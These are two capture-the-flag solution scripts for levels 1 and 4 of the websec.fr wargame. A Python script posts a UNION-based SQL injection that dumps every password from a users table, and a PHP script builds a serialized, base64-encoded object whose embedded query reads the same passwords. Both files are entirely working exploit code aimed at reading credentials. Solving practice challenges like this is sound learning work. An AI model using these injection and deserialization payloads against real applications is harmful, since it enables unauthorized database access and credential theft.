File: websec_fr/babysteps/level01/solve.py
import httpx
import re

url = "https://websec.fr/level01/index.php"
injection = "1 UNION SELECT 1, GROUP_CONCAT(password) FROM users;-- "

with httpx.Client() as client:
    r1 = client.get(url)
    token = re.search(r'token" value="(.*)"', r1.text).group(1)

    r2 = client.post(url, data = { "user_id" : injection, "token" : token, "submit" : "Submit" })
    flag = re.search(r'WEBSEC\{(.*)\}', r2.text).group()
    print(flag)

File: websec_fr/babysteps/level04/solve.php
<?php

class SQL {
    public $query;
    public $conn;

    public function __construct($query) {
        $this->query = $query;
    }
}

$injection = new SQL("SELECT GROUP_CONCAT(password) AS username FROM users;");
echo base64_encode(serialize($injection)) . "\n";

?>